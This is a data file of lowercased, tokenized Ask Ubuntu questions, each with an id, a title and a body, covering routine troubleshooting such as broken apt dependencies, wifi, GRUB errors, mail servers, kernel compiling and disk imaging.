318730	trouble with apt-get , libc6 , and locales : ca n't upgrade/install anything	os : ubuntu 12.04 64 bit i 'm in a bit of a serious bind here . i was trying to get my webcam working , so i installed gstreamer and then was installing cheese to test it . but in doing so , something got screwed up with libc6 . now i 'm trying to run : sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.5.0-23-generic linux-headers-3.5.0-23 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : locales the following packages will be upgraded : locales 1 upgraded , 0 newly installed , 0 to remove and 1470 not upgraded . 1 not fully installed or removed . need to get 0 b/3,846 kb of archives . after this operation , 6,733 kb of additional disk space will be used . do you want to continue [ y/n ] ? y warning : the following packages can not be authenticated ! locales install these packages without verification [ y/n ] ? y dpkg : dependency problems prevent configuration of locales : libc6 ( 2.17-7 ) breaks locales ( < < 2.17 ) and is installed . version of locales to be configured is 2.13+git20120306-3 . dpkg : error processing locales ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : locales e : sub-process /usr/bin/dpkg returned an error code ( 1 ) if i try sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these . the following packages have unmet dependencies : libc6 : breaks : locales ( < 2.17 ) e : unmet dependencies . try using -f .
318734	i do n't have a css decoder , what software should i download ?	i tried to open movie player with a movie but it gives me crap about a decoding library . then i learned about the modern css scrambling and i could n't find anything to help .
318737	wifi frequently drops but it says it 's connected in the top right corner . [ ubuntu 12.04.2 lts ]	i have been getting issues trying to get wifi working on my pc . i can browse the internet for about 5 minutes then the internet drops and i have to manually disconnect then reconnect to get my connection back . i 'm confused because it says i 'm connected to my network but really , i 'm not . if it helps , i 'm using a asus usb-n13 b1 revision wireless adapter with rtl8192cu drivers and an actiontec v1000h router . all help is greatly appreciated !
318741	where i can download ubuntu 13.04 iso torrents ?	i want to download ubuntu 13.04 desktop using torrent because speed is faster than normal download , where i can download iso torrent for ubuntu 13.04 . my torrent client is utorrent .
318742	fresh installing ubuntu 12.04 on built pc , kernel panic	i have never encountered this error trying to install ubuntu before . i get the following message on booting from dvd . error : could n't read from file press any key to continue ... after pressing a key it displays the following and my keyboard and mouse go dark . [ 0.731089 ] kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) [ 0.731111 ] pid : 1 , comm : swapper/0 not tainted 3.5.0-23-generic # 35~precise1-ubuntu [ 0.731129 ] call trace : it continues on with the actual trace . i thought it might be an issue with my hardware . here are my specs . motherboard : msi z77 mpower processor : i7 3770k ( stock 3.5 ghz ) ram : 32gb 1600 hd : seagate barracuda 500gb graphics : nvidia geforce 660ti ( stock ) i do have windows 7 installed on this hard drive but i shrunk it down and have half of to space unused . this might also be the issue . i get this error when testing the installation media , trying to boot the live disc , and installing . however , i did manage to get it to run when i went through the windows installer but i actually want the real thing . i also tested the disc and md5sum on another computer to make sure it was n't an issue , everything seems to be in order . any help would be very much appreciated .
318751	grub error on ubuntu 13.04 : 'invalid environment block '	after having problems with my h-p printer my ubuntu 13.04 wont load . this is what i get : grub - editenv ! error : invalid environment block
318754	is it possible to restore my lost photos from memory card ?	my memory card was found yesterday , but i found the photos stored in it have gone , is it possible to restore them back ? if so , how ? please recommend some affordable program and works for my memory card , thanks .
318757	installed packages : what repository are they from ?	how can i determine which repository is being used for an installed packages ? i have a few custom ppa repositories , and i 'm concerned on one system whether the installed package is from one ppa or the other . thank you .
318766	how to shut down the 70+ systems by the one remote machine ?	what ways are there to shut down a computer remotely ? my desktop is running ubuntu 12.04 desktop edition and when i try to shut it down remotely , it does n't actually work . i used the command sudo shutdown now . however , when i got home , i came to discover that the computer was still on stuck .
318769	as far as server versions where unity is n't a factor , what are the differences between 12.04 and 13.04 ?	i 'm spinning up some new servers and i 'm tempted to make the leap to 13.04 solely because i can install php5 without a ppa . it 's not a big deal , it 's just a thought . i 've been using 12.04 for about a year now , it 's served me quite well and i learned a lot on it . i 'm not worried about lts , these servers will probably be replaced with bigger ones , rotated out , re-configured and re-created a few times a year . i use only the remote shell to control the things , so unity is a zero factor , i know that 's a controversy these days so i figured i 'd mention it does n't matter here . my stack is nginx , php5 , and mongodb . i also use server side v8js in a few small places ... if that is of any relevance . are there any other differences i should be aware of ? my first reaction was `` no big deal , newer is better , should n't make a difference '' - but i ca n't find a clear answer anywhere that is n't related to ui .
318772	fog & compiling a kernel	we have been using fog installed on ubuntu to image computers and have now started creating an image as a hyper-v virtual machine ( an image created as a virtual machine was a recommendation to us , and we are running hyper-v hosts so we created it as a hyper-v virtual ) . we are having trouble getting the kernel that fog is using to read the hard drive of the virtual ( and it wo n't pass the disk check of fog 's compatibility test ) , so we assume that the drivers in the kernel do n't support what the hyper-v virtual uses . we have now tried to compile a new kernel ( 3.10 ) using the .config file that fog supplies and the command sudo make xconfig which brings up a kernel configurator , but where it says microsoft hyper-v guest support there is no tickbox next to it to include it in the kernel ? have tried ticking virtualization drivers and virtualization , and then compiled the kernel , but it has n't seemed to fix our problem . we are trying to do this on an installation of ubuntu 12.04 . does anyone know how to include hyper-v support in the kernel , and whether or not it will actually be a solution for our problem ? any other ideas ? please bare in mind , we do not know much about linux/unix operating systems and have never compiled a kernel before .
318775	what is `` openssl binaries '' and `` openssl development package '' ?	build it using general c development environment with bash , gcc ( 3 or 4 series ) , make , etc on a linux machine . building pre-requirements are : ** 1. openssl binaries ; 2. openssl development package with include files ( on debian package libssl-dev ) ; **
318776	how do i log out specific sessions ?	i have read this these generic instructions to log users out , but i want more detail . when i run the command users i see multiple instances of the same user . ie : joe joe joe joe joe how do i know if joe is active ? how would i find more information about what joe is doing in each session ? ( like can i close a session joe has open , and not loose his work ? ) i am familiar with the w command . say this user left his terminal on at home , then came into work ; but rebooting the server is n't a good idea , i just used the command pkill -kill -u joe bash this threw me out of the shell and out of the open-shell from home , with no idea if i 'm loosing work in this process . what can be done to help me evaluate which sessions can be closed safely ? i tried skill -kill -v /dev/pts/1 to kill a specific session , but nothing happened .
318777	combine multiple text files into one file	i am using the unix pr command to combine multiple text files into one text file : pr -f *files > newfile each file is a different length , a different number of lines . i am mostly happy with the result , i like that it includes the name of the original text file followed by the contents of that file . however , i would like to eliminate the blank lines in between the name of the original text file and it 's contents . i only want blank lines between the different text files to separate each . also , it prints the character ^l after the contents of each text file , and i would like to eliminate that character . each file read in is also given a 'page ' number . only one file is longer than the 66 line default . that file ends up being spit into 2 'pages ' , and is split into 2 sections divided by blank lines . is it possible to write that text in continuously without it being split ? thank you for any help !
318778	can i install 12.04 and then upgrade to 13.04 to get latest features ?	i have a netbook 1015cx by asus . when i install 13.04 , it lags drastically and not usable at all . hence yesterday i installed 12.04 and it seems to be working great . but as my netbook has only 10 inches . of screen i am not able to re-size the icon size etc . of the launch bar . i saw that option to change icon size in 13.04 . hence my question , can i upgrade 12.04 to 13.04 without the lagness and get all the latest features ? thanks .
318780	how to set cpufreq governor to performance ?	i am on ubuntu 13.04 64-bit . i have heard that setting the cpufreq governor to performance will , well , increase performance . unfortunately , i am a bit of a newbie at this sort of thing , and i am not sure how i would go about doing this . if i do sudo cpufreq-set -c 0 -g performance i get : error setting new values . common errors : - do you have proper administration rights ? ( super-user ? ) - is the governor you requested available and modprobed ? - trying to set an invalid policy ? - trying to set a specific frequency , but userspace governor is not available , for example because of hardware which can not be set to a specific frequency or because the userspace governor is n't loaded ? cpufreq-info gives me : cpufrequtils 008 : cpufreq-info ( c ) dominik brodowski 2004-2009 report errors and bugs to cpufreq @ vger.kernel.org , please . analyzing cpu 0 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms. analyzing cpu 1 : no or unknown cpufreq driver is active on this cpu maximum transition latency : 4294.55 ms . this is the output of cat /proc/cpuinfo processor : 0 vendor_id : genuineintel cpu family : 15 model : 4 model name : intel ( r ) pentium ( r ) d cpu 2.80ghz stepping : 4 microcode : 0x6 cpu mhz : 2800.026 cache size : 1024 kb physical id : 0 siblings : 2 core id : 0 cpu cores : 2 apicid : 0 initial apicid : 0 fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc pebs bts nopl pni dtes64 monitor ds_cpl cid cx16 xtpr bogomips : 5600.05 clflush size : 64 cache_alignment : 128 address sizes : 36 bits physical , 48 bits virtual power management : processor : 1 vendor_id : genuineintel cpu family : 15 model : 4 model name : intel ( r ) pentium ( r ) d cpu 2.80ghz stepping : 4 microcode : 0x6 cpu mhz : 2800.026 cache size : 1024 kb physical id : 0 siblings : 2 core id : 1 cpu cores : 2 apicid : 1 initial apicid : 1 fpu : yes fpu_exception : yes cpuid level : 5 wp : yes flags : fpu vme de pse tsc msr pae mce cx8 apic sep mtrr pge mca cmov pat pse36 clflush dts acpi mmx fxsr sse sse2 ss ht tm pbe syscall nx lm constant_tsc pebs bts nopl pni dtes64 monitor ds_cpl cid cx16 xtpr bogomips : 5600.05 clflush size : 64 cache_alignment : 128 address sizes : 36 bits physical , 48 bits virtual power management : any help would be appreciated .
318782	what is ulimit and how to install in ubuntu ?	what is ulimit and how to install in ubuntu ? when i am trying to install , i 'm getting the below error : e : unable to locate package ulimit
318784	ubuntu one : publish file option available in firefox but not chrome	is this a known bug ? i can publish an ubuntu one file or folder in firefox , but that option under the `` more '' button is n't available in chrome .
318788	reverse commands which disabled network-manager ?	while attempting a wifi fix , i was prompted to run the following commands : sudo mv /etc/init/network-manager.conf /etc/init/network-manager.conf-disabled sudo mv /etc/xdg/autostart/nm-applet.desktop /etc/xdg/autostart/nm-applet.desktop.disabled how can i reverse/undo those commands ? i ask because i could not get the wifi-fix to work , but am now unable to revert to an old workaround . i suspect this is because of changes made by those two commands . and so until i get this resolved , i can not connect to the internet in ubuntu , which is my primary os . note that my netbook has no ethernet port , therefore i have no way of connecting to the internet in order to restore network manager , as has bee suggested to others facing network manager issues . the fix i was attempting is detailed at this link : marvell 's wireless driver not recognized
318791	where do the system error reports go ?	every once in a while an error pops up , so there 's this dialogue box which asks if one would like to inform ubuntu about it . upon confirming , where does this report go ? can it be followed up ? if it is followed up , is there a fix that is provided later ? or is there some place where the solution is provided , which one can check and sort ot out ?
318793	issue on installing wine on ubuntu 11.10	i have installed wine on my ubuntu 11.10 using apt-get install . in between installation , that process was stopped unfortunately . i do n't know that whether wine is installed or not . but , it did n't work . if i again try to install using the same apt-get install , it gives the following error . e : could not get lock /var/lib/dpkg/lock - open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ? please help me to rectify it . thank you in advanced ! ! !
318794	package development tools	i have some source code , i would like to make into debian packages for ubuntu . its been quite some times since i made packages , and i am wondering if there are any really great tools out there to help me get this done .
318796	when trying to enter bios gnu grub screen appears	i was trying to change my boot device on ubuntu but when i hold f2 [ the key to enter my bios ] ubuntu gnu grub appear . i would like to know how to enter my bios so i can continue changing my boot device . please help !
318798	youtube-dl installed , but not found in dash or applications	i have installed youtube-dl ( program for downloading videos from youtube ) successfully but i am not able to see it either in dash or among application folder . it is listed in software centre and synaptic packet manager . somebody suggest a way out..thanks in advance
318800	ca n't start ubuntu installation	i downloaded the iso from the official ubuntu site , burnt the iso to dvd and on restarting , i get the following error- start booting from usb device syslinux 3.82 i 've tried to install 13.04 and 12.10 , but i 've faced the same error . later , i decided to install linux mint 15 , only to get the same error . i reached the welcome screen , but when i select any of the given options , nothing happens and i get this error- corrupted kernel image i decided to check the distros on virtualbox and they work fine , so where did i go wrong ?
318807	from 12.04 to 12.10	i have laptop installed with 12.04 and one day when i powered it up , it showed the option of booting from ubuntu and advanced etc . on selecting boot from ubuntu , it showed the blank screen . i tried restarting re-seating the ram/hdd but no joy . then re-installed 12.04 now i want to upgrade to 13.04 however i came to know that i have to get 12.10 first . do i need to download 12.10 and only then can i upgrade ?
318808	sony vaio e series sve15113en brightness issue	i have a ony vaio e series sve15113en laptop . i am using a dual boot system with win 7 and ubuntu 12.04 lts . in ubuntu i am unable to adjust the brightness either by using fn keys or by the default brightness adjust settings from system settings . the hot keys slide but no changes and the same is with the option from system settings menu in ubuntu . there are many threads here regarding this issue in this forum , but none has given a precise answer . that is the reason why i am opened a new thread . if this thread is duplicate kindly merge it with the relevant one . my eyes hurt from the extreme brightness from the screen forcing me to resort to windows . i think this laptop has a built in intel hd graphics . hope to receive an answer from the experts here . thanking you all in advance for the replies .
318810	virus creates files in desktop	i am using ubuntu 12.04 . there are some weird files appears in my desktop , i googled some file names , and i found dghv.exe appeared in a list of virus . http : //www.linhadefensiva.org/forum/arquivado/topicos/3/43343-meu-primeiro-virus.html does anyone know what virus cause this situation ? and how to solve this problem ?
318812	how to add any language [ punjabi ] in libre office 3	i am using ubuntu from the previous long time almost 2 years . today there is need to type a letter in the punjabi language [ named as lohit punjabi ] in libre office . but when i was being try to write in specimen language it just be write in english ! i had searched that problem from google search but do n't get sufficient answer . so any one can give me some couples of suggestion & feedback regards how i can add the language [ punjabi ] in libre office . thanks on the behalf of your worthily suggestion .
318816	if i upgrade to ubuntu 13.04 from 12.04 will i lose my data and apps ?	i have n't added any partition to my present system ... will my files in folders like documents and apps be available after i update ?
318824	how to solve pkg_resources.versionconflict error during bin/python bootstrap.py -d	i am tring to create a new plone environment using python plone-devstart.py tool . i got a bootstrap error . so i used a command bin/python bootstrap.py -d from my project directory . it ( bin/python bootstrap.py -d command ) worked fine before but now i got an error like oomsys @ oomsysmob-6 : ~/demobrun $ bin/python bootstrap.py -d downloading http : //pypi.python.org/packages/source/d/distribute/distribute- 0.6.49.tar.gz extracting in /tmp/tmpdqvwya now working in /tmp/tmpdqvwya/distribute-0.6.49 building a distribute egg in /tmp/tmpv4bzyv /tmp/tmpv4bzyv/distribute-0.6.49-py2.7.egg traceback ( most recent call last ) : file `` bootstrap.py '' , line 118 , in < module > ws.require ( 'zc.buildout ' + version ) file `` build/bdist.linux-i686/egg/pkg_resources.py '' , line 698 , in require file `` build/bdist.linux-i686/egg/pkg_resources.py '' , line 600 , in resolve pkg_resources.versionconflict : ( setuptools 0.6c11 ( /home/oomsys/demobrun /lib/python2.7/site-packages/setuptools-0.6c11-py2.7.egg ) , requirement.parse ( 'setuptools > =0.7 ' ) )
318828	how can i export skype chat history to a text file or other readable file in ubuntu 13.04	i want to be able to export my chat history so i can read it outside of skype and save it permanently somewhere else . i have seen many suggestion about main.db file in skype directory but unable to find that file in ubuntu 13.04 or if however i found main.db file so how can i convert in text file . please let me know you suggestion .
318829	problem using postfix with sendmail	i 've sendmail installed using `` apt-get install sendmail '' and also postfix installed using webmin . but postfix can not start , and when i checked the /var/log/mail.err *jul 11 14:09:03 victoria postfix/master [ 6588 ] : fatal : bind 0.0.0.0 port 25 : address already in use jul 11 14:09:10 victoria postfix/master [ 6821 ] : fatal : bind 0.0.0.0 port 25 : address already in use jul 11 14:09:11 victoria postfix/master [ 6820 ] : fatal : daemon initialization failure jul 11 14:09:12 victoria postfix/postfix-script [ 6822 ] : fatal : mail system startup failed* and my `` netstat -tap '' show : *root @ victoria : /etc/init.d # netstat -tap active internet connections ( servers and established ) proto recv-q send-q local address foreign address state pid/program name tcp 0 0 localhost : mysql * : * listen 2365/mysqld tcp 0 0 localhost : submission * : * listen 5639/sendmail : mta : tcp 0 0 * : webmin * : * listen 896/perl tcp 0 0 * : ssh * : * listen 554/sshd tcp 0 0 localhost : smtp * : * listen 5639/sendmail : mta : tcp 0 384 192.241.205.208 : ssh 175.139.222.195:45062 established 29460/1 tcp6 0 0 [ : : ] : http [ : : ] : * listen 773/apache2 tcp6 0 0 [ : : ] : ssh [ : : ] : * listen 554/sshd getnameinfo failed getnameinfo failed tcp6 0 1 [ unknown ] : http [ unknown ] :60003 last_ack -* disable sendmail can get the postfix up and running . but i thought sendmail and postfix are suppose to work together ? how to configure to have them both in a server ? thanks .
318831	how to change winetricks default wineprefix directory	i want to modify wineprefix installed with playonlinux using winetricks .
318835	can i install ubuntu12.04.2 desktop from my usb on some other computer while it boot ?	my computer is having a booting properly and i have windows xp installed in it so i decided to install ubuntu . can i do that through the boot manager using a usb stick ? ? ?
318846	how to install ubuntu on oem win 8	i have an asus q500a 64bit notebook with oem installed windows 8 . i am preparing to install ubuntu 13.04 to dual boot . any basic install advice would be nice , will win8 secure boot , uefi , interfere and how can i get around it .
318848	how to install azhagi+ font in ubuntu 11.10	please let me know how to install azhagi+ font in ubuntu11.10 .
318852	rsyslog filter by tag	i would like to create a rsyslogd config file that filter the syslog for specific tag and outputs this tag to a specific file . i create a rule file under /etc/rsyslog.d # log kernel generated ufw log messages to file : syslogtag , isequal , `` abc '' /var/log/abc.log # uncomment the following to stop logging anything that matches the last rule . # doing this will stop logging kernel generated ufw log messages to the file # normally containing kern . * messages ( eg , /var/log/kern.log ) # & ~ the file is created , however the messages with abc tag still go to the syslog file . how do i do it correctly ?
318858	perl : problem with locales	i 'm trying to install cgiproxy on my ubuntu server and according to the instructions i have to : copy the file nph-proxy.cgi onto your web server somewhere , but not at the top web directory , or else it will be easily discovered . change the file 's permissions to be executable . on unix and mac , you can do this with the command chmod +x nph-proxy.cgi there are other ways . in the directory where you copied nph-proxy.cgi , run the command ./nph-proxy.cgi install-modules ( or in windows , perl nph-proxy.cgi install-modules ) . this installs the optional perl modules to e.g . let you visit secure sites . if you ca n't run this as root/administrator , it will still work , but see the instructions displayed at the end after all the scrolling text ( which you can ignore ) . if it asks you any questions , you can just hit ret . i 'm at step 3 but when i run the command ./nph-proxy.cgi install-modules i get the following : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_us : en '' , lc_all = ( unset ) , lc_ctype = `` utf-8 '' , lang = `` en_us.utf-8 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . i 'm still pretty new to linux so i 'm not sure what the issue is here , i 've tried to run the command with sudo but still the same error . any help is greatly appreciated , thanks !
318859	nvidia drivers have no xorg.conf file	i have recently bought a cyborg rat7 mouse and this mouse does n't work properly under ubuntu . i found a tutorial ( link below ) on how to fix this . the problem is though , that i do n't have the xorg.conf file . is there a different file for nvidia drivers ? or do i create one ? http : //fcns.eu/2011/04/01/cyborg-rat-7-mouse-under-linux/
318860	how to install `` megamario '' ( `` sdl/sdl.h '' not found )	i tried to install megamario1.7 on ubuntu 12.04 64bit ( http : //sourceforge.net/projects/mmario/ ? source=dlp ) i installed all requiered sdl-libraries . wenn i type in make prefix=/usr/local it gives me the error sdl/sdl.h - no such file ore directory what should i do to solve this ?
318862	ubuntu 12.04 - network manager problem in system tray	i am using ubuntu 12.04 and i installed fallback version of desktop . i have a problem about my network manager in system tray . i can see network manager but no button is working in network manager in system tray . i could not make buttons in network manager as seen in the image worked . what can be the solution of this problem ? thank you !
318866	can anyone tell me if there is a way to use lubuntu with a linux mint flavour/theme ?	i have tried before to use ubuntu with linux mint theme/icons ... it worked pretty well . is there a way to use linux mint themes/icons with lubuntu and enjoy its stability and speed ?
318867	best chess board editor	is there any chess board editor for ubuntu to create a chess position ( drag & drop , add pieces & etc . ) and then be able to save/export it ? i would like for it to be open source because i 'm going to use it on an armel chroot . my goal is to be able to save a position from physical chessboard .
318870	unable to install a cgi script on ubuntu	i 'm trying to install cgiproxy on ubuntu . http : //www.jmarshall.com/tools/cgiproxy/install.html # install basically it 's a single `` nph-proxy.cgi '' file which i placed in my /var/www folder . i used this command from the instructions : ./nph-proxy.cgi install-modules nothing seems to happen and when i navigate in my browser to the ip address with the `` nph-proxy.cgi '' , all i see are a whole page of code whereas instead i should see a gui form . i 'm still new to linux and modules and any help is greatly appreciated . thanks
318879	ca n't find steam in ububtu software center	i am having a problem . i can not find steam on ubuntu software center . i was able to find it before i installed ubuntu , but now i am not able to find it . any suggestions ?
318888	my laptop stole the internet	i have an hp dm4 laptop running ubuntu 13.04 ( although i 've noticed this on 12.04 and 12.10 ) . when i am connected to the wifi at home none of my housemates are able to get decent connection . they can connect but not use the internet . i 've noticed it a number of other places including hotspots in motels etc . it 's not a problem for me but i am becoming increasingly unpopular at home ! ! i have the broadcom sta wireless driver installed and am using it . let me know if i can give any more useful information . thanks
318889	64bit ubuntu 13.04 not recognizing additional 4gb ram	os info sysadmin @ linux01 : ~ $ cat /etc/lsb-release distrib_id=ubuntu distrib_release=13.04 distrib_codename=raring distrib_description= '' ubuntu 13.04 '' sysadmin @ linux01 : ~ $ uname -a linux linux01 3.2.0-38-generic # 61-ubuntu smp tue feb 19 12:18:21 utc 2013 x86_64 x86_64 x86_64 gnu/linux sysadmin @ linux01 : ~ $ free -m total used free shared buffers cached mem : 3887 3462 424 0 104 1172 -/+ buffers/cache : 2186 1701 swap : 15259 0 15259 hardware info id : firmware description : bios vendor : intel corp. physical id : 0 version : tcibx10h.86a.0037.2010.0614.1712 date : 06/14/2010 size : 64kib capacity : 960kib capabilities : pci upgrade shadowing cdboot bootselect socketedrom edd int13floppy1200 int13floppy720 int13floppy2880 int5printscreen int9keyboard int14serial int17printer acpi usb biosbootspecification id : cpu description : cpu product : intel ( r ) core ( tm ) i5 cpu 760 @ 2.80ghz vendor : intel corp. physical id : 4 bus info : cpu @ 0 version : intel ( r ) core ( tm ) i5 cpu 760 @ 2.80ghz id : memory description : system memory physical id : 28 slot : system board or motherboard size : 8gib id : bank:0 description : dimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : jm1333kln-4g vendor : undefined physical id : 0 serial : 0009b06f slot : channel a size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) id : bank:2 description : dimm ddr3 synchronous 1333 mhz ( 0.8 ns ) product : jm1333klh-4g vendor : undefined physical id : 2 serial : 0009ea2b slot : channel b size : 4gib width : 64 bits clock : 1333mhz ( 0.8ns ) additional info from dmidecode # dmidecode 2.11 smbios 2.6 present . 79 structures occupying 3163 bytes . table at 0x000e9270 . handle 0x0000 , dmi type 0 , 24 bytes bios information vendor : intel corp . version : tcibx10h.86a.0037.2010.0614.1712 release date : 06/14/2010 address : 0xf0000 runtime size : 64 kb rom size : 1024 kb characteristics : pci is supported bios is upgradeable bios shadowing is allowed boot from cd is supported selectable boot is supported bios rom is socketed edd is supported 5.25 '' /1.2 mb floppy services are supported ( int 13h ) 3.5 '' /720 kb floppy services are supported ( int 13h ) 3.5 '' /2.88 mb floppy services are supported ( int 13h ) print screen service is supported ( int 5h ) 8042 keyboard services are supported ( int 9h ) serial services are supported ( int 14h ) printer services are supported ( int 17h ) acpi is supported usb legacy is supported bios boot specification is supported targeted content distribution is supported handle 0x0028 , dmi type 16 , 15 bytes physical memory array location : system board or motherboard use : system memory error correction type : none maximum capacity : 16 gb error information handle : 0x0029 number of devices : 4 handle 0x002b , dmi type 17 , 28 bytes memory device array handle : 0x0028 error information handle : 0x002c total width : 64 bits data width : 64 bits size : 4096 mb form factor : dimm set : none locator : channel a bank locator : channel a-dimm 0 type : ddr3 type detail : synchronous speed : 1333 mhz manufacturer : undefined serial number : 0009b06f asset tag : a1_assettagnum0 part number : jm1333kln-4g rank : 2 handle 0x0031 , dmi type 17 , 28 bytes memory device array handle : 0x0028 error information handle : 0x0032 total width : 64 bits data width : 64 bits size : 4096 mb form factor : dimm set : none locator : channel b bank locator : channel b-dimm 0 type : ddr3 type detail : synchronous speed : 1333 mhz manufacturer : undefined serial number : 0009ea2b asset tag : a1_assettagnum2 part number : jm1333klh-4g rank : 1 as you can see from the above information , lshw can detech 8gb ram on my system , but the os can not . its a 64bit system . i have tried running a live cd , no luck . i have also installed the latest kernel , did upgrade-grub and have checked the /etc/default/grub config file . no issues there . i have upgraded the bios as well . can anyone help resolve this issue ?
318893	how do i create a bit identical image of a usb stick ?	i have a usb stick which is unreadable for some reason . i want to make an image of it for storage purposes so i can try to retrieve the data from the image at a later date . how would i go about creating such a bit identical image of a usb stick ? this is the error i get when using dd : oshirowanen @ desktop : ~ $ sudo dd if=/dev/sdd of=/usb_image [ sudo ] password for oshirowanen : dd : reading `/dev/sdd ' : input/output error 0+0 records in 0+0 records out 0 bytes ( 0 b ) copied , 1.00783 s , 0.0 kb/s oshirowanen @ desktop : ~ $
318898	ubuntu server routing table	i 've a ubuntu server ( 13.04 ) with 3 nics . this is my routing table : destination gateway genmask flags metric ref use iface default vodafone.statio 0.0.0.0 ug 0 0 0 p1p1 192.168.8.0 * 255.255.255.0 u 0 0 0 p2p2 192.168.17.0 * 255.255.255.0 u 0 0 0 p2p1 the server is on the interet and sees the 2 subnets . my pc is on subnet 17.xxx , i can ping all pcs on the subnet 8.xxx but i ca n't go on the internet . how can i configure the routing table to redirect my request on the web ?
318905	how can i clone my current installation of ubuntu 13.04 amd64 with uefi to make live image/cd	i want to create a livecd of my current installed ubuntu 13.04 amd64 ( uefi mode ) . so i get back all my installed packages in fresh ubuntu install . i read some other question but they are for older versions and i install it with uefi mode . edit : is there any software that can create a .iso image ( livecd ) form my liveusb of ubuntu 13.04 amd64
318909	how to install closed source software from command line	if i want to install restricted ( closed source ) software like steam in ubuntu , i have to use software centre . is there anyway to install such software right from the command line ?
318918	grub not working mbr broken	i have a laptop with windows xp professional sp3 on it , later on i dual-booted the machine with ubuntu 13.04 . i used a program call aomei partition assistant for the partitioning . windows 8.1 preview came out and i thought to give it a shot , so i downloaded the iso file , fired up aomei partition assistant , after merging the ubuntu partition to the c : to get some space for windows 8.1 i went ahead and restarted the computer , aomei did its thing and it restarts again and comes up a black screen saying : `` error : unknow filesystem . grub rescure > _ ( the underscore is blinking ) please help ! ! ! note : i do n't have the windows xp sp3 disc , because this is a used laptop
318919	ubuntu 12.04 lts wo n't install	i have a windows 8 laptop , 64 bit os , x64 based processor . i downloaded ubuntu 12.04 lts matching all of these specs . i go to boot it , and i hit `` install ubuntu '' but it just gives me a blank screen . i let it sit for 10 minutes , but it did n't change , so i tried it again . same result . i tried running ubuntu without installing and it still did n't work . any suggestions ? ? and am i supposed to run wubi.exe file ? ?
318923	backspace and arrow keys not working in vi editor	the backspace is unable to erase the characters . the navigation keys produce alphabets . can anyone tell me how to fix this ?
318924	how much is ubuntu 13.04 related to/depends on gnome ?	i noticed that ubuntu unity ( 13.04 ) uses a lot of gnome related packages , even with no added stuff to its configuration . in a first install of unity , i messed up with my configuration because i tried to install gnome shell , and when i finally tried to get rid of that , deleting lots of gnome related stuff , i ended up with a broken unity experience . in the end , no unity at all ! so i 'd like to understand the relation between the ubuntu unity desktop experience and the gnome related packages . i understood that gdm has been replaced with lightdm , but , among other things , is it safe to install gnome utilies like gnome tweak tool ? or the gnome themes and background packages ? or will it finally mess up the unity experience in the end ?
318932	package maneger broken . unmet dependencies	i tried to fix one problem and created another ... my update manager broke ... the package system is broken check if you are using third party repositories . if so disable them , since they are a common source of problems . furthermore run the following command in a terminal : apt-get install -f i run apt-get install -f and i get : missx @ missx : ~ $ apt-get install -f e : could not open lock file /var/lib/dpkg/lock - open ( 13 : permission denied ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , are you root ? i tried reinstalling software center i get this missx @ missx : ~ $ sudo apt-get -- reinstall install software-center [ sudo ] password for missx : reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : network-manager-dbg : depends : network-manager ( = 0.9.4.0-0ubuntu3 ) but 0.9.4.0-0ubuntu4.2 is to be installed or libnm-util2 ( = 0.9.4.0-0ubuntu3 ) but 0.9.4.0-0ubuntu4.2 is to be installed or libnm-glib4 ( = 0.9.4.0-0ubuntu3 ) but 0.9.4.0-0ubuntu4.2 is to be installed or libnm-glib-vpn1 ( = 0.9.4.0-0ubuntu3 ) but 0.9.4.0-0ubuntu4.2 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . the network maneger is the piece of crap i installed yesterday to fix my wi-fi issue ... do n't have synaptic installed ( that would be too easy , right.. ? ) sudo apt-get -f install missx @ missx : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : linux-headers-3.2.0-38 libsub-name-perl libparse-debianchangelog-perl libnspr4-0d : i386 libsigc++-2.0-0c2a : i386 libcwidget3 libboost-iostreams1.46.1 libgconf2-4 : i386 libapt-pkg4.12 : i386 libio-string-perl linux-headers-3.2.0-38-generic libept1.4.12 libclass-accessor-perl libnss3-1d : i386 use 'apt-get autoremove ' to remove them . the following extra packages will be installed : network-manager-dbg the following packages will be upgraded : network-manager-dbg 1 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . 1 not fully installed or removed . need to get 0 b/1,463 kb of archives . after this operation , 8,192 b of additional disk space will be used . do you want to continue [ y/n ] ? y dpkg : dependency problems prevent configuration of network-manager-dbg : network-manager-dbg depends on network-manager ( = 0.9.4.0-0ubuntu3 ) | libnm-util2 ( = 0.9.4.0-0ubuntu3 ) | libnm-glib4 ( = 0.9.4.0-0ubuntu3 ) | libnm-glib-vpn1 ( = 0.9.4.0-0ubuntu3 ) ; however : version of network-manager on system is 0.9.4.0-0ubuntu4.2 . version of libnm-util2 on system is 0.9.4.0-0ubuntu4.2 . version of libnm-glib4 on system is 0.9.4.0-0ubuntu4.2 . version of libnm-glib-vpn1 on system is 0.9.4.0-0ubuntu4.2 . dpkg : error processing network-manager-dbg ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . errors were encountered while processing : network-manager-dbg e : sub-process /usr/bin/dpkg returned an error code ( 1 ) ''
318938	cpu utilization mail alert for any running services	i need to get e-mail alert if % cpu is above 95 % for any current running services . can any body help me for this script ?
